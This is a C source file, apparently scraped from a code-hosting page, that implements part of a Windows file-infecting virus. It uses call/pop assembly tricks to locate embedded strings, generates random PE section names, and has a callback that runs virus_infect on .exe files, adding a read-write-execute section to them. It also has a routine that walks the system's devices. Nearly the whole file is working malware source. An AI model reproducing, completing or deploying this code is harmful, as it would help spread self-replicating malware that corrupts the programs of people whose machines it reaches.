102 lines
2.5 KiB
C
102 lines
2.5 KiB
C
#include "infect.h"
|
|
//#include <stdio.h>
|
|
|
|
void *check_if_section_in_file(sec_info *file, sec_info *section);
|
|
void *check_if_file_in_file_list(sec_info *fileList, sec_info *file);
|
|
static void add_to_ret_list(sec_info *retBase, sec_info *newFbase);
|
|
static void merge_sec_lists(sec_info *retFbase, sec_info *addFbase);
|
|
sec_info *infect_build_sec_name_struct(pids *pids);
|
|
|
|
//void print_list(sec_info *list);
|
|
|
|
sec_info *si = NULL;
|
|
|
|
char *infect_gen_sec_name() {
|
|
char *charBytes, *oldSName;
|
|
int rand;
|
|
|
|
__asm__("call post;\r\n"
|
|
".string \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.1234567890\";\r\n"
|
|
".string \"CCCCCCCC\";\r\n"
|
|
"post:\r\n"
|
|
"pop %0;\r\n"
|
|
:"=r"(charBytes)
|
|
:
|
|
:);
|
|
// oldSName = charBytes + 63;
|
|
oldSName = pic_malloc(8);
|
|
rand = pic_gen_random(10);
|
|
if (rand < 5) return oldSName;
|
|
for (int i = 0; i < 8; i++) {
|
|
if (0 != i
|
|
&& oldSName[i-1] == 0) {
|
|
oldSName[i] = '\x00';
|
|
}
|
|
rand = pic_gen_random(64);
|
|
oldSName[i] = charBytes[rand];
|
|
}
|
|
return oldSName;
|
|
}
|
|
|
|
void *infect_callback_ptr() {
|
|
void *idp;
|
|
|
|
__asm__("call nIns;\r\n"
|
|
"nIns:\r\n"
|
|
"pop %0;\r\n"
|
|
:"=r" (idp)
|
|
:
|
|
:);
|
|
#define ID_OFFSET 12
|
|
return (idp+ID_OFFSET);
|
|
}
|
|
|
|
//returns number of infected files
|
|
int infect_callback(char *path, int pathLen, dir_list *fileAttr) {
|
|
char *exeString;
|
|
void *testFd;
|
|
char *secName;
|
|
__asm__("call afterString;\r\n"
|
|
".string \".exe\";\r\n"
|
|
".string \".new00\";\r\n"
|
|
"afterString:\r\n"
|
|
"pop %0;\r\n"
|
|
:"=r"(exeString)
|
|
:
|
|
:);
|
|
secName = infect_gen_sec_name();
|
|
if (!pic_strcmp(&path[pathLen-4], exeString)) return 0;
|
|
if (-1 == virus_infect(path, secName, (IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE))) return 0;
|
|
return 1;
|
|
}
|
|
|
|
void *infect_devices_ptr() {
|
|
void *idp;
|
|
|
|
__asm__("call nIns2;\r\n"
|
|
"nIns2:\r\n"
|
|
"pop %0\r\n"
|
|
:"=r" (idp)
|
|
:
|
|
:);
|
|
#define ID_OFFSET 12
|
|
return (idp+ID_OFFSET);
|
|
}
|
|
|
|
int infect_devices() {
|
|
dir_list *dev, *devCur;
|
|
void *icb;
|
|
|
|
icb = infect_callback_ptr();
|
|
|
|
dev = pic_get_devices();
|
|
devCur = dev;
|
|
while (devCur->next) {
|
|
// pic_get_paths_callback(devCur->fName, icb);
|
|
message_box( devCur->fName);
|
|
devCur = devCur->next;
|
|
}
|
|
return 0;
|
|
}
|
|
|